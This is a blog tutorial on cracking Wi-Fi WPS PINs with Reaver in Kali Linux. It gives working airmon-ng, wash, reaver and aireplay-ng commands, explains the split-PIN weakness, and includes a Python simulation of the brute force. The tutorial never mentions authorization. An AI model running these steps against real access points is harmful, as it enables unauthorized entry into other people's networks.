Monday, 30 January 2017

WPS Wi-Fi Testing using Reaver in Kali Linux


WPS PIN Brute-Force Attack

Let’s start!


Requirement - 

1. Kali Linux running machine.

2. An external USB Wi-Fi adapter whose chipset supports monitor mode and packet injection.

Open your Terminals - 

Enable wireless card monitor mode - 

Assuming you have a capable card, let's switch it from managed to monitor mode. First kill the processes (NetworkManager, wpa_supplicant and friends) that would interfere with monitor mode:

# airmon-ng check kill

Enable monitor mode:

# airmon-ng start wlan0

If you don't know which interface your wireless card is, run iwconfig, ifconfig or ip addr show.

In iwconfig output the wireless interfaces are the ones marked IEEE 802.11; yours will probably be named wlan0 or something similar.

Airmon will create a new interface called wlan0mon, which is your wlan0 but in monitor mode.


We will use wash command to find a WPS vulnerable access point.

# wash -i wlan0mon

If you encounter the [!] Found packet with bad FCS, skipping... error, try:

# wash -i wlan0mon --ignore-fcs

Wash then lists the APs that have WPS enabled. Look at the WPS Locked column: a value of No means the AP is still accepting registrar (PIN) attempts and is worth trying, while Yes means the AP has locked WPS, usually after too many failed PINs, and Reaver will stall against it until the lock is lifted.

Select your target AP and take note of its BSSID and Channel.

Launch the attack - 

Now that we have the target's BSSID and channel, we can launch the attack:

reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv

where -a tells Reaver to auto-detect the best advanced options based on the target's behaviour and -vv turns on verbose output.

Check reaver --help for more options.

Some wireless cards, like the Alfa AWUS036NH I used, run into an association error. You can work around it by opening another terminal and doing the association with aireplay-ng (fake authentication, sent once):

# aireplay-ng -1 0 -a <BSSID> <interface>

Then add the -A argument to your reaver command, which tells Reaver not to associate itself because another process is handling the association:

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A



Another thing to look out for is when Reaver reaches M5 right away and then times out sending the M6 message.
It may be that the target AP does have WPS enabled but has not been configured.

Don't waste your time on this AP, I've tried it and Reaver will never get the PIN.

If you are receiving WSC NACK messages, the AP is responding to PIN attempts as expected: a NACK after M4 means the first half of the PIN was wrong, a NACK after M6 means the second half was wrong, and Reaver simply moves on to the next candidate.

It will take around 10 hours or even days, depending on the signal strength, for Reaver to crack the PIN. The attack is feasible at all because the 8-digit PIN is verified in two halves: the AP NACKs M4 if the first four digits are wrong and NACKs M6 if the last four are wrong, and the eighth digit is a checksum of the other seven. That leaves at most 10,000 + 1,000 = 11,000 attempts instead of 10,000,000, at one to a few seconds per attempt over the air.

The good thing is you can pause Reaver (Ctrl+C) and resume the attack later: it saves its progress for that BSSID and picks up where it stopped, so you can leave it running overnight if you wish.
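To make the M4/M6 NACK behaviour, the 11,000-attempt bound and the pause/resume concrete, here is a constructed simulation of the split-PIN brute force. It is an added example, not code from this post or from Reaver: the SimulatedRegistrar class stands in for the access point and models only the accept/NACK decisions (no real WPS Diffie-Hellman or HMAC), the Session class is a stand-in for what Reaver persists between runs, and the PIN 12345670 and PSK string are constructed sample values.

```python
"""Simulation of the two-phase WPS PIN brute force (constructed example, not Reaver)."""

from dataclasses import dataclass
from typing import Optional, Tuple

WPS_PIN_SPACE_NAIVE = 10**7          # 7 free digits if the PIN were checked as a whole
WPS_PIN_SPACE_SPLIT = 10**4 + 10**3  # what the half-by-half check reduces it to


def wps_checksum(first_seven: int) -> int:
    """Return the 8th WPS PIN digit (the checksum) for the first seven digits.
    Digits are weighted 3,1,3,1,... from the right; the checksum pads the sum to a multiple of 10."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


class SimulatedRegistrar:
    """Access-point side of the exchange (constructed stand-in). A real AP proves the
    first four PIN digits at M4 and the last four at M6; a wrong half gets a WSC NACK."""

    def __init__(self, pin: str, psk: str):
        if len(pin) != 8 or not pin.isdigit():
            raise ValueError("WPS PIN must be 8 digits")
        self._first, self._second = pin[:4], pin[4:]
        self._psk = psk
        self.m4_count = 0   # how many M4 exchanges the AP answered
        self.m6_count = 0   # how many M6 exchanges the AP answered

    def m4(self, first_half: str) -> bool:
        """True: AP continues to M5. False: WSC NACK, first half wrong."""
        self.m4_count += 1
        return first_half == self._first

    def m6(self, second_half: str) -> Optional[str]:
        """PSK (what M7 would carry) when the second half is right, else None (NACK)."""
        self.m6_count += 1
        return self._psk if second_half == self._second else None


@dataclass
class Session:
    """Stand-in for the progress Reaver saves per BSSID so Ctrl+C and resume work."""
    first_half: Optional[str] = None   # set once phase 1 succeeds
    next_first: int = 0                # next 4-digit candidate to try
    next_second: int = 0               # next 3-digit candidate to try


def brute_force(ap: SimulatedRegistrar, session: Session,
                max_attempts: Optional[int] = None) -> Optional[Tuple[str, str]]:
    """Run at most max_attempts PIN attempts. Returns (pin, psk) on success, or None
    when the budget runs out (paused); the session is updated in place for a resume."""
    attempts = 0
    # Phase 1: first four digits. Each candidate is confirmed (AP proceeds to M5)
    # or rejected with a NACK after M4, so at most 10^4 attempts.
    while session.first_half is None:
        if max_attempts is not None and attempts >= max_attempts:
            return None                          # paused; session keeps the position
        if session.next_first >= 10_000:
            raise RuntimeError("first half not found: AP is not answering M4 honestly")
        cand = f"{session.next_first:04d}"
        session.next_first += 1
        attempts += 1
        if ap.m4(cand):
            session.first_half = cand
    # Phase 2: last three free digits; the 8th digit is the checksum, so it is
    # computed rather than guessed. At most 10^3 attempts, each NACKed after M6.
    while session.next_second < 1_000:
        if max_attempts is not None and attempts >= max_attempts:
            return None
        tail = f"{session.next_second:03d}"
        session.next_second += 1
        attempts += 1
        seven = session.first_half + tail
        pin = seven + str(wps_checksum(int(seven)))
        if not ap.m4(session.first_half):        # M1-M4 are re-sent with the known half
            raise RuntimeError("AP stopped accepting the known first half (WPS locked?)")
        psk = ap.m6(pin[4:])
        if psk is not None:                      # M7 hands over the network credentials
            return pin, psk
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    ap = SimulatedRegistrar("12345670", "constructed-psk")   # constructed target
    session = Session()
    print("first run (paused):", brute_force(ap, session, max_attempts=500))
    print("resumed:", brute_force(ap, session))
    print("M4 exchanges:", ap.m4_count, "M6 exchanges:", ap.m6_count,
          "worst case:", WPS_PIN_SPACE_SPLIT, "vs naive:", WPS_PIN_SPACE_NAIVE)
```

Running it shows the first call stopping after 500 M4 attempts with nothing learned, and the resumed call finishing from candidate 0500 rather than from scratch, which is exactly why the Ctrl+C-and-resume workflow costs nothing. The phase-2 loop also shows why an AP that starts NACKing the already-confirmed first half (the WPS Locked case) stops the attack dead.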


Once Reaver has found the PIN, the AP hands over its network credentials in message M7 and Reaver prints the WPA PSK. You can now connect to the network and continue the assessment from the inside.

Have a safe hack.
